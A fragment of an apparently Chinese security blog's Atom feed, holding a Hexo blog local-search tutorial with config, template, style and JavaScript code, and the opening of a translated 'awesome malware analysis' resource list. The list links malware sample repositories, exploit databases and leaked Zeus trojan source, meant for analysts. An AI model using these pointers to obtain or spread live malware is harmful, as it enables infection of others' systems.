        &lt;h2 id=&quot;01-extract变量覆盖&quot;&gt;&lt;a href=&quot;#01-extract变量覆盖&quot; class=&quot;headerlink&quot; title=&quot;01 extract变量覆盖&quot;&gt;&lt;/a&gt;01 extract变量覆盖&lt;/h2&gt;&lt;p&gt;&lt;strong&gt;code&lt;/strong&gt;&lt;
      
    
    </summary>
    
    
      <category term="PHP CTF tricks" scheme="https://hackfun.org/tags/PHP-CTF-tricks/"/>
    
  </entry>
  
  <entry>
    <title>给hexo添加本地搜索站内功能</title>
    <link href="https://hackfun.org/2017/10/04/%E7%BB%99hexo%E6%B7%BB%E5%8A%A0%E6%9C%AC%E5%9C%B0%E6%90%9C%E7%B4%A2%E7%AB%99%E5%86%85%E5%8A%9F%E8%83%BD/"/>
    <id>https://hackfun.org/2017/10/04/给hexo添加本地搜索站内功能/</id>
    <published>2017-10-04T10:19:43.000Z</published>
    <updated>2017-10-04T20:36:40.118Z</updated>
    
    <content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>之前博客用的typecho的deep主题，还是挺喜欢的，只是感觉写文章就是稍微有点麻烦，每次都需要登录网站后台编写或发布，而且很多东西我都喜欢开源，分享知识也是，于是最近就尝试用hexo + github pages，用了这套组合才知道这简直太符合我这种懒癌，博客搭建配置好后，本地编写markdown文章之后直接<code>hexo g</code> 然后<code>hexo d</code> 就发布了，寻找很久的主题，后来看到P牛博客前端用的hexo的<a href="https://github.com/sunnyelf/cactus-dark" target="_blank" rel="external">cactus-dark</a>主题，顿时就喜欢上了，博客配置成功之后又装了一些必要的插件，然后对博客布局和样式代码进行一些修改，由于cactus-dark主题没有搜索功能，于是便尝试给添加搜索功能。</p><h1 id="过程"><a href="#过程" class="headerlink" title="过程"></a>过程</h1><p>至于hexo怎么搭建hexo + github pages博客网上一堆就不讲了，由于搜索功能是调用hexo-generator-search生成xml数据，所以需要安装hexo-generator-search插件：<br></p><figure class="highlight sh"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ npm install --save hexo-generator-search</div></pre></td></tr></table></figure><p></p><p>然后为hexo博客的配置文件_config.yml添加插件配置（注意：不是主题的配置文件）：<br></p><figure class="highlight yml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="attr">search:</span></div><div class="line"><span class="attr">  path:</span> <span class="string">search.xml</span></div><div class="line"><span class="attr">  field:</span> <span class="string">post</span></div></pre></td></tr></table></figure><p></p><p>添加到search页面的导航：<br></p><figure class="highlight yml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line"><span class="attr">nav:</span></div><div class="line"><span class="attr">  Home:</span> <span class="string">/</span></div><div class="line"><span class="attr">  About:</span> <span class="string">/about/</span></div><div class="line"><span class="attr">  Link:</span> <span class="string">/link/</span></div><div class="line"><span class="attr">  Archives:</span> <span class="string">/archives/</span></div><div class="line"><span class="attr">  Projects:</span> <span class="attr">https://github.com/sunnyelf</span></div><div class="line"><span class="attr">  Search:</span> <span class="string">/search/</span></div></pre></td></tr></table></figure><p></p><p>然后在<code>themes\cactus-dark\layout</code>文件夹下新建search.ejs文件，编写搜索框模板：<br></p><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">section</span> <span class="attr">id</span>=<span class="string">"search"</span>&gt;</span></div><div class="line">    <span class="tag">&lt;<span class="name">span</span> <span class="attr">class</span>=<span class="string">"h1"</span>&gt;</span><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"#"</span>&gt;</span>Search<span class="tag">&lt;/<span class="name">a</span>&gt;</span><span class="tag">&lt;/<span class="name">span</span>&gt;</span></div><div class="line">    <span class="tag">&lt;<span class="name">form</span>&gt;</span></div><div class="line">        <span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span>=<span class="string">"row"</span>&gt;</span></div><div class="line">            <span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span>=<span class="string">"col-xs-8 col-md-4"</span>&gt;</span></div><div class="line">                <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">class</span>=<span class="string">"search-input"</span> <span class="attr">id</span>=<span class="string">"search-input"</span> <span class="attr">placeholder</span>=<span class="string">"search..."</span>&gt;</span></div><div class="line">            <span class="tag">&lt;/<span class="name">div</span>&gt;</span></div><div class="line">            <span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span>=<span class="string">"col-xs-4 col-md-2"</span>&gt;</span></div><div class="line">                <span class="tag">&lt;<span class="name">button</span> <span class="attr">type</span>=<span class="string">"reset"</span> <span class="attr">class</span>=<span class="string">"reset-button"</span> <span class="attr">onclick</span>=<span class="string">"resetSearch()"</span>&gt;</span>reset<span class="tag">&lt;/<span class="name">button</span>&gt;</span></div><div class="line">            <span class="tag">&lt;/<span class="name">div</span>&gt;</span></div><div class="line">        <span class="tag">&lt;/<span class="name">div</span>&gt;</span></div><div class="line">        <span class="tag">&lt;/<span class="name">form</span>&gt;</span></div><div class="line">        <span class="tag">&lt;<span class="name">div</span> <span class="attr">id</span>=<span class="string">"search-result"</span>&gt;</span><span class="tag">&lt;/<span class="name">div</span>&gt;</span></div><div class="line">        <span class="tag">&lt;<span class="name">p</span> <span class="attr">class</span>=<span class="string">'no-result'</span>&gt;</span>No results found<span class="tag">&lt;/<span class="name">p</span>&gt;</span></div><div class="line"><span class="tag">&lt;/<span class="name">section</span>&gt;</span></div></pre></td></tr></table></figure><p></p><p>由于上面用到了flexboxgrid的CSS框架，所以需要在<code>C:\Users\Jing Ling\Documents\blog\themes\cactus-dark\layout\_partial\styles.ejs</code>文件引入：<br></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">&lt;% if (page.layout === &apos;search&apos;) &#123; %&gt;</div><div class="line">&lt;link href=&quot;https://cdn.bootcss.com/flexboxgrid/6.3.1/flexboxgrid.min.css&quot; rel=&quot;stylesheet&quot;&gt;</div><div class="line">&lt;% &#125; %&gt;</div></pre></td></tr></table></figure><p></p><p>，之后<code>\themes\cactus-dark\source\css\_partial</code>新建search.styl文件，编写搜索框样式：<br></p><figure class="highlight styl"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div></pre></td><td class="code"><pre><div class="line">.search-input</div><div class="line">  <span class="attribute">font-size</span>: <span class="number">0.875rem</span></div><div class="line">  <span class="attribute">height</span>: <span class="number">1.75rem</span></div><div class="line">  <span class="attribute">border-width</span>: <span class="number">1px</span></div><div class="line">  <span class="attribute">display</span>: block</div><div class="line">  <span class="attribute">font-family</span>: inherit</div><div class="line">  <span class="attribute">padding</span>: <span class="number">0.5rem</span></div><div class="line">  <span class="attribute">width</span>: <span class="number">100%</span></div><div class="line"></div><div class="line">.reset-button</div><div class="line">  <span class="attribute">height</span>: <span class="number">1.75rem</span></div><div class="line">  <span class="attribute">color</span>: <span class="number">#fff</span></div><div class="line">  <span class="attribute">background-color</span>: <span class="number">#2bbc8a</span>;</div><div class="line">  <span class="attribute">padding</span>: <span class="number">0</span> <span class="number">16px</span></div><div class="line">  font-size:.8em</div><div class="line">  <span class="attribute">border</span>:<span class="number">1px</span> solid <span class="number">#2bbc8a</span>;</div><div class="line">  <span class="attribute">border-radius</span>:<span class="number">2px</span>;</div><div class="line">  <span class="attribute">font-family</span>: inherit</div><div class="line">  <span class="attribute">font-weight</span>: bold</div><div class="line"></div><div class="line"><span class="selector-id">#search-result</span> <span class="selector-tag">ul</span><span class="selector-class">.search-result-list</span> &#123;</div><div class="line">  <span class="attribute">list-style-type</span>:none;</div><div class="line">  <span class="attribute">padding</span>: <span class="number">0px</span>;</div><div class="line">&#125;</div><div class="line"></div><div class="line"><span class="selector-id">#search-result</span> <span class="selector-tag">li</span> &#123;</div><div class="line">  <span class="attribute">margin</span>: <span class="number">2em</span> auto;</div><div class="line">  <span class="attribute">border-bottom</span>: <span class="number">2px</span> solid <span class="number">#2bbc8a</span>;</div><div class="line">&#125;</div><div class="line"></div><div class="line"><span class="selector-id">#search-result</span> <span class="selector-class">.search-result-list</span> <span class="selector-tag">li</span>:hover &#123;</div><div class="line">  <span class="attribute">color</span>:<span class="number">#eee</span></div><div class="line">&#125;</div><div class="line"></div><div class="line"><span class="selector-id">#search-result</span> <span class="selector-tag">a</span><span class="selector-class">.search-result-title</span> &#123;</div><div class="line">  <span class="attribute">line-height</span>: <span class="number">1.2</span>;</div><div class="line">  <span class="attribute">font-weight</span>: bold;</div><div class="line">  <span class="attribute">color</span>: <span class="number">#2bb48a</span>;</div><div class="line">&#125;</div><div class="line"></div><div class="line"><span class="selector-id">#search-result</span> <span class="selector-tag">p</span><span class="selector-class">.search-result</span> &#123;</div><div class="line">  <span class="attribute">margin</span>: <span class="number">0.4em</span> auto;</div><div class="line">  <span class="attribute">max-height</span>: <span class="number">13em</span>;</div><div class="line">  <span class="attribute">overflow</span>: hidden;</div><div class="line">  <span class="attribute">font-size</span>: <span class="number">0.8em</span>;</div><div class="line">  <span class="attribute">text-align</span>: justify;</div><div class="line">&#125;</div><div class="line"></div><div class="line"><span class="selector-id">#search-result</span> <span class="selector-tag">em</span><span class="selector-class">.search-keyword</span> &#123;</div><div class="line">  <span class="attribute">color</span>: <span class="number">#f58e90</span>;</div><div class="line">  <span class="attribute">border-bottom</span>: <span class="number">1px</span> dashed <span class="number">#f58e90</span>;</div><div class="line">  <span class="attribute">font-weight</span>: bold;</div><div class="line">  <span class="attribute">font-size</span>: <span class="number">0.85em</span>;</div><div class="line">&#125;</div><div class="line"></div><div class="line"><span class="selector-tag">p</span><span class="selector-class">.no-result</span> &#123;</div><div class="line">  <span class="attribute">display</span>: none;</div><div class="line">  <span class="attribute">padding-bottom</span>: <span class="number">0.5em</span>;</div><div class="line">  <span class="attribute">color</span>: <span class="number">#eee</span>;</div><div class="line">  <span class="attribute">border-bottom</span>: <span class="number">2px</span> solid <span class="number">#2bbc8a</span>;</div><div class="line">&#125;</div></pre></td></tr></table></figure><p></p><p>为了调用编写的样式需要在<code>\themes\cactus-dark\source\css\style.styl</code>样式文件添加<code>@import &quot;_partial/search&quot;</code>引入。<br>之后便是编写search.js处理hexo-generator-search生成索引数据search.xml：<br></p><figure class="highlight js"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div></pre></td><td class="code"><pre><div class="line"><span class="comment">// // A local search script with the help of [hexo-generator-search](https://github.com/PaicHyperionDev/hexo-generator-search)</span></div><div class="line"><span class="comment">// MIT License</span></div><div class="line"><span class="comment">// Copyright (C) 2015</span></div><div class="line"><span class="comment">// Joseph Pan &lt;https://github.com/wzpan&gt;</span></div><div class="line"><span class="comment">// Shuhao Mao &lt;https://github.com/maoshuhao&gt;</span></div><div class="line"><span class="comment">// MOxFIVE &lt;https://github.com/MOxFIVE&gt;</span></div><div class="line"><span class="comment">// Jing Ling &lt;https://github.com/sunnyelf&gt;</span></div><div class="line"><span class="keyword">var</span> searchFunc = <span class="function"><span class="keyword">function</span> (<span class="params">path, search_id, content_id</span>) </span>&#123;</div><div class="line"><span class="meta">    'use strict'</span>;</div><div class="line">    $.ajax(&#123;</div><div class="line">        url: path,</div><div class="line">        dataType: <span class="string">"xml"</span>,</div><div class="line">        success: <span class="function"><span class="keyword">function</span> (<span class="params">xmlResponse</span>) </span>&#123;</div><div class="line">            <span class="comment">// get the contents from search data</span></div><div class="line">            <span class="keyword">var</span> datas = $(<span class="string">"entry"</span>, xmlResponse).map(<span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</div><div class="line">                <span class="keyword">return</span> &#123;</div><div class="line">                    title: $(<span class="string">"title"</span>, <span class="keyword">this</span>).text(),</div><div class="line">                    content: $(<span class="string">"content"</span>, <span class="keyword">this</span>).text(),</div><div class="line">                    url: $(<span class="string">"url"</span>, <span class="keyword">this</span>).text()</div><div class="line">                &#125;;</div><div class="line">            &#125;).get();</div><div class="line">            <span class="keyword">var</span> $input = <span class="built_in">document</span>.getElementById(search_id);</div><div class="line">            <span class="keyword">var</span> $resultContent = <span class="built_in">document</span>.getElementById(content_id);</div><div class="line">            $input.addEventListener(<span class="string">'input'</span>, <span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</div><div class="line">                <span class="keyword">var</span> str = <span class="string">'&lt;ul class=\"search-result-list\"&gt;'</span>;</div><div class="line">                <span class="keyword">var</span> keywords = <span class="keyword">this</span>.value.trim().toLowerCase().split(<span class="regexp">/[\s\-]+/</span>);</div><div class="line">                $resultContent.innerHTML = <span class="string">""</span>;</div><div class="line">                <span class="keyword">if</span> (<span class="keyword">this</span>.value.trim().length &lt;= <span class="number">0</span>) &#123;</div><div class="line">                    <span class="keyword">return</span>;</div><div class="line">                &#125;</div><div class="line">                <span class="comment">// perform local searching</span></div><div class="line">                datas.forEach(<span class="function"><span class="keyword">function</span> (<span class="params">data</span>) </span>&#123;</div><div class="line">                    <span class="keyword">var</span> isMatch = <span class="literal">true</span>;</div><div class="line">                    <span class="keyword">var</span> content_index = [];</div><div class="line">                    <span class="keyword">var</span> data_title = data.title.trim().toLowerCase();</div><div class="line">                    <span class="keyword">var</span> data_content = data.content.trim().replace(<span class="regexp">/&lt;[^&gt;]+&gt;/g</span>, <span class="string">""</span>).toLowerCase();</div><div class="line">                    <span class="keyword">var</span> data_url = data.url;</div><div class="line">                    <span class="keyword">var</span> index_title = <span class="number">-1</span>;</div><div class="line">                    <span class="keyword">var</span> index_content = <span class="number">-1</span>;</div><div class="line">                    <span class="keyword">var</span> first_occur = <span class="number">-1</span>;</div><div class="line">                    <span class="comment">// only match artiles with not empty titles and contents</span></div><div class="line">                    <span class="keyword">if</span> (data_title != <span class="string">''</span> &amp;&amp; data_content != <span class="string">''</span>) &#123;</div><div class="line">                        keywords.forEach(<span class="function"><span class="keyword">function</span> (<span class="params">keyword, i</span>) </span>&#123;</div><div class="line">                            index_title = data_title.indexOf(keyword);</div><div class="line">                            index_content = data_content.indexOf(keyword);</div><div class="line">                            <span class="keyword">if</span> (index_title &lt; <span class="number">0</span> &amp;&amp; index_content &lt; <span class="number">0</span>) &#123;</div><div class="line">                                isMatch = <span class="literal">false</span>;</div><div class="line">                            &#125; <span class="keyword">else</span> &#123;</div><div class="line">                                <span class="keyword">if</span> (index_content &lt; <span class="number">0</span>) &#123;</div><div class="line">                                    index_content = <span class="number">0</span>;</div><div class="line">                                &#125;</div><div class="line">                                <span class="keyword">if</span> (i == <span class="number">0</span>) &#123;</div><div class="line">                                    first_occur = index_content;</div><div class="line">                                &#125;</div><div class="line">                            &#125;</div><div class="line">                        &#125;);</div><div class="line">                    &#125;</div><div class="line">                    <span class="comment">// show search results</span></div><div class="line">                    <span class="keyword">if</span> (isMatch) &#123;</div><div class="line">                        str += <span class="string">"&lt;li&gt;&lt;a href='"</span> + data_url + <span class="string">"' class='search-result-title' target='_blank'&gt;"</span> + <span class="string">"&gt; "</span> + data_title + <span class="string">"&lt;/a&gt;"</span>;</div><div class="line">                        <span class="keyword">var</span> content = data.content.trim().replace(<span class="regexp">/&lt;[^&gt;]+&gt;/g</span>, <span class="string">""</span>);</div><div class="line">                        <span class="keyword">if</span> (first_occur &gt;= <span class="number">0</span>) &#123;</div><div class="line">                            <span class="comment">// cut out characters</span></div><div class="line">                            <span class="keyword">var</span> start = first_occur - <span class="number">6</span>;</div><div class="line">                            <span class="keyword">var</span> end = first_occur + <span class="number">6</span>;</div><div class="line">                            <span class="keyword">if</span> (start &lt; <span class="number">0</span>) &#123;</div><div class="line">                                start = <span class="number">0</span>;</div><div class="line">                            &#125;</div><div class="line">                            <span class="keyword">if</span> (start == <span class="number">0</span>) &#123;</div><div class="line">                                end = <span class="number">10</span>;</div><div class="line">                            &#125;</div><div class="line">                            <span class="keyword">if</span> (end &gt; content.length) &#123;</div><div class="line">                                end = content.length;</div><div class="line">                            &#125;</div><div class="line">                            <span class="keyword">var</span> match_content = content.substr(start, end);</div><div class="line">                            <span class="comment">// highlight all keywords</span></div><div class="line">                            keywords.forEach(<span class="function"><span class="keyword">function</span> (<span class="params">keyword</span>) </span>&#123;</div><div class="line">                                <span class="keyword">var</span> regS = <span class="keyword">new</span> <span class="built_in">RegExp</span>(keyword, <span class="string">"gi"</span>);</div><div class="line">                                match_content = match_content.replace(regS, <span class="string">"&lt;em class=\"search-keyword\"&gt;"</span> + keyword + <span class="string">"&lt;/em&gt;"</span>);</div><div class="line">                            &#125;)</div><div class="line">                            str += <span class="string">"&lt;p class=\"search-result\"&gt;"</span> + match_content + <span class="string">"...&lt;/p&gt;"</span></div><div class="line">                        &#125;</div><div class="line">                    &#125;</div><div class="line">                &#125;)</div><div class="line">                $resultContent.innerHTML = str;</div><div class="line">            &#125;)</div><div class="line">        &#125;</div><div class="line">    &#125;)</div><div class="line">&#125;</div><div class="line"><span class="keyword">var</span> inputArea = <span class="built_in">document</span>.querySelector(<span class="string">"#search-input"</span>);</div><div class="line"><span class="keyword">var</span> $resultArea = $(<span class="string">"#search-result"</span>);</div><div class="line">inputArea.onfocus = <span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</div><div class="line">    <span class="keyword">var</span> path = <span class="string">"/search.xml"</span>;</div><div class="line">    searchFunc(path, <span class="string">'search-input'</span>, <span class="string">'search-result'</span>);</div><div class="line">&#125;</div><div class="line">inputArea.onkeydown = <span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</div><div class="line">    <span class="keyword">if</span> (event.keyCode == <span class="number">13</span>) &#123;</div><div class="line">        <span class="keyword">return</span> <span class="literal">false</span></div><div class="line">    &#125;</div><div class="line">&#125;</div><div class="line">resetSearch = <span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</div><div class="line">    $resultArea.html(<span class="string">""</span>);</div><div class="line">    $(<span class="string">".no-result"</span>).hide();</div><div class="line">&#125;</div><div class="line">$resultArea.bind(<span class="string">"DOMNodeRemoved DOMNodeInserted"</span>, <span class="function"><span class="keyword">function</span> (<span class="params">e</span>) </span>&#123;</div><div class="line">    <span class="keyword">if</span> (!$(e.target).text()) &#123;</div><div class="line">        $(<span class="string">".no-result"</span>).show(<span class="number">200</span>);</div><div class="line">    &#125; <span class="keyword">else</span> &#123;</div><div class="line">        $(<span class="string">".no-result"</span>).hide();</div><div class="line">    &#125;</div><div class="line">&#125;)</div></pre></td></tr></table></figure><p></p><p>将search.js放入到<code>\themes\cactus-dark\source\js</code>文件夹下，为了调用js需要在<code>\themes\cactus-dark\layout\_partial\scripts.ejs</code>添加引入：<br></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">&lt;% if (page.layout === &apos;search&apos;) &#123; %&gt;</div><div class="line">    &lt;%- js(&apos;js/search.js&apos;) %&gt;</div><div class="line">&lt;% &#125; %&gt;</div></pre></td></tr></table></figure><p></p><p>使用hexo命令新建search页面，<code>hexo new page search</code>，会生成<code>\source\search\index.md</code>，在index.md添加yaml标记,表示此页面渲染使用search模板：<br></p><figure class="highlight yml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="meta">---</span></div><div class="line"><span class="attr">layout:</span> <span class="string">search</span></div><div class="line"><span class="meta">---</span></div></pre></td></tr></table></figure><p></p><p>最后依此使用<code>hexo generate</code>和<code>hexo server</code>命令，访问<code>http://localhost:4000/search/</code>便可以进行搜索了。</p><h1 id="后话"><a href="#后话" class="headerlink" title="后话"></a>后话</h1><p>如果你不想折腾话，我已将添加了搜索功能pull到了<a href="https://github.com/probberechts/cactus-dark" target="_blank" rel="external">cactus-dark</a>，你可以根据cactus-dark的说明直接开始使用。</p>]]></content>
    
    <summary type="html">
    
      
      
        &lt;h1 id=&quot;前言&quot;&gt;&lt;a href=&quot;#前言&quot; class=&quot;headerlink&quot; title=&quot;前言&quot;&gt;&lt;/a&gt;前言&lt;/h1&gt;&lt;p&gt;之前博客用的typecho的deep主题，还是挺喜欢的，只是感觉写文章就是稍微有点麻烦，每次都需要登录网站后台编写或发布，而且很多东西我都喜
      
    
    </summary>
    
      <category term="学习记录" scheme="https://hackfun.org/categories/%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/"/>
    
    
      <category term="hexo" scheme="https://hackfun.org/tags/hexo/"/>
    
      <category term="search" scheme="https://hackfun.org/tags/search/"/>
    
  </entry>
  
  <entry>
    <title>超赞的恶意软件分析</title>
    <link href="https://hackfun.org/2017/10/03/%E8%B6%85%E8%B5%9E%E7%9A%84%E6%81%B6%E6%84%8F%E8%BD%AF%E4%BB%B6%E5%88%86%E6%9E%90/"/>
    <id>https://hackfun.org/2017/10/03/超赞的恶意软件分析/</id>
    <published>2017-10-03T05:50:18.000Z</published>
    <updated>2017-10-03T05:56:13.743Z</updated>
    
    <content type="html"><![CDATA[<p><img src="/2017/10/03/超赞的恶意软件分析/0.png" alt="超赞的恶意软件分析"></p><h1 id="超赞的恶意软件分析"><a href="#超赞的恶意软件分析" class="headerlink" title="超赞的恶意软件分析"></a>超赞的恶意软件分析</h1><p>清单列举了一些超赞的恶意软件分析工具和资源。</p><ul><li><a href="#超赞的恶意软件分析">超赞的恶意软件分析</a><ul><li><a href="#恶意软件集合">恶意软件集合</a><ul><li><a href="#匿名代理">匿名代理</a></li><li><a href="#蜜罐">蜜罐</a></li><li><a href="#恶意软件样本库">恶意软件样本库</a></li></ul></li><li><a href="#开源威胁情报">开源威胁情报</a><ul><li><a href="#工具">工具</a></li><li><a href="#其他资源">其他资源</a></li></ul></li><li><a href="#检测与分类">检测与分类</a></li><li><a href="#在线扫描与沙盒">在线扫描与沙盒</a></li><li><a href="#域名分析">域名分析</a></li><li><a href="#浏览器恶意软件">浏览器恶意软件</a></li><li><a href="#文档和 Shellcode">文档和 Shellcode</a></li><li><a href="#文件提取">文件提取</a></li><li><a href="#去混淆">去混淆</a></li><li><a href="#调试与逆向工程">调试与逆向工程</a></li><li><a href="#网络">网络</a></li><li><a href="#内存取证">内存取证</a></li><li><a href="#Windows 神器">Windows 神器</a></li><li><a href="#存储和工作流">存储和工作流</a></li><li><a href="#杂项">杂项</a></li></ul></li><li><a href="#资源">资源</a><ul><li><a href="#书籍">书籍</a></li><li><a href="#Twitter">Twitter</a></li><li><a href="#其它">其它</a></li></ul></li><li><a href="#相关 Awesome 清单">相关 Awesome 清单</a></li><li><a href="#贡献者">贡献者</a></li><li><a href="#致谢">致谢</a></li></ul><hr><h2 id="恶意软件集合"><a href="#恶意软件集合" class="headerlink" title="恶意软件集合"></a>恶意软件集合</h2><h3 id="匿名代理"><a href="#匿名代理" class="headerlink" title="匿名代理"></a>匿名代理</h3><p><em>对于分析人员的 Web 流量匿名方案</em></p><ul><li><a href="http://anonymouse.org/" target="_blank" rel="external">Anonymouse.org</a> - 一个免费、基于 Web 的匿名代理</li><li><a href="https://openvpn.net/" target="_blank" rel="external">OpenVPN</a> - VPN 软件和托管解决方案</li><li><a href="http://www.privoxy.org/" target="_blank" rel="external">Privoxy</a> - 一个带有隐私保护功能的开源代理服务器</li><li><a href="https://www.torproject.org/" target="_blank" rel="external">Tor</a> - 洋葱路由器，为了在浏览网页时不留下客户端 IP 地址</li></ul><h3 id="蜜罐"><a href="#蜜罐" class="headerlink" title="蜜罐"></a>蜜罐</h3><p><em>捕获和收集你自己的样本</em></p><ul><li><a href="https://github.com/mushorg/conpot" target="_blank" rel="external">Conpot</a> - ICS/SCADA 蜜罐</li><li><a href="https://github.com/micheloosterhof/cowrie" target="_blank" rel="external">Cowrie</a> - 基于 Kippo 的 SSH 蜜罐</li><li><a href="http://dionaea.carnivore.it/" target="_blank" rel="external">Dionaea</a> - 用来捕获恶意软件的蜜罐</li><li><a href="http://glastopf.org/" target="_blank" rel="external">Glastopf</a> - Web 应用蜜罐</li><li><a href="http://honeyd.org/" target="_blank" rel="external">Honeyd</a> - 创建一个虚拟蜜罐</li><li><a href="http://honeydrive.org/" target="_blank" rel="external">HoneyDrive</a> - 蜜罐包的 Linux 发行版</li><li><a href="https://github.com/johnnykv/mnemosyne" target="_blank" rel="external">Mnemosyne</a> - 受 Dinoaea 支持的蜜罐数据标准化</li><li><a href="https://github.com/buffer/thug" target="_blank" rel="external">Thug</a> - 用来调查恶意网站的低交互蜜罐</li></ul><h3 id="恶意软件样本库"><a href="#恶意软件样本库" class="headerlink" title="恶意软件样本库"></a>恶意软件样本库</h3><p><em>收集用于分析的恶意软件样本</em></p><ul><li><a href="http://support.clean-mx.de/clean-mx/viruses.php" target="_blank" rel="external">Clean MX</a> - 恶意软件和恶意域名的实时数据库</li><li><a href="http://contagiodump.blogspot.com/" target="_blank" rel="external">Contagio</a> - 近期的恶意软件样本和分析的收集</li><li><a href="https://www.exploit-db.com/" target="_blank" rel="external">Exploit Database</a> - Exploit 和 shellcode 样本</li><li><a href="http://malshare.com" target="_blank" rel="external">Malshare</a> - 在恶意网站上得到的大量恶意样本库</li><li><a href="http://malwaredb.malekal.com/" target="_blank" rel="external">MalwareDB</a> - 恶意软件样本库</li><li><a href="http://openmalware.org/" target="_blank" rel="external">Open Malware Project</a> - 样本信息和下载</li><li><a href="https://github.com/robbyFux/Ragpicker" target="_blank" rel="external">Ragpicker</a> - 基于 malware crawler 的一个插件</li><li><a href="https://github.com/ytisf/theZoo" target="_blank" rel="external">theZoo</a> - 分析人员的实时恶意样本库</li><li><a href="http://tracker.h3x.eu/" target="_blank" rel="external">Tracker h3x</a> - Agregator 的恶意软件跟踪和下载地址</li><li><a href="http://www.virusign.com/" target="_blank" rel="external">ViruSign</a> - 除 ClamAV 外的反病毒程序检出的恶意软件数据库</li><li><a href="http://virusshare.com/" target="_blank" rel="external">VirusShare</a> - 恶意软件库</li><li><a href="http://vxvault.net/" target="_blank" rel="external">VX Vault</a> - 恶意软件样本的主动收集</li><li><a href="https://zeltser.com/malware-sample-sources/" target="_blank" rel="external">Zeltser’s Sources</a> - 由 Lenny Zeltser 整理的恶意软件样本源列表</li><li><a href="https://github.com/Visgean/Zeus" target="_blank" rel="external">Zeus Source Code</a> - 2011 年 Zeus 源码泄露</li></ul><h2 